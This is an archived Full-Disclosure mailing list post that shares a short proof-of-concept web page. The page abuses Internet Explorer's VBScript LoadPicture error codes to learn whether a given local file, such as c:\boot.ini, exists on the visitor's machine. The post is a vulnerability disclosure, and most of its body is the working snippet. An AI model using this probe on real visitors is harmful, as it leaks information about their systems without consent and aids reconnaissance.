lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <017701c3ed7d$b57deed0$3200000a@alex>
From: jkuperus at planet.nl (Jelmer)
Subject: (no subject)

similar to 

http://www.securityfocus.com/archive/1/248143
http://www.greymagic.com/adv/gm008-ie/
http://www.guninski.com/wmp-desc.html

no biggie


--- snip --

<form onsubmit="doIt(this);return false">
    <input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>

<script language="vbscript">
    
    Sub loadIt(filename)
        LoadPicture(filename)
    End Sub

</script>

<script language="javascript">
    
    function doIt(form) {
    
        try {
            loadIt(form.filename.value);
        } catch(e) {
            result = e.number;
        }
        
        if (result != -2146827856) {
            alert('file exists');
        } else {
            alert('file does not exist');
        }
    }
</script>

--- snip --
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040207/c497c226/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ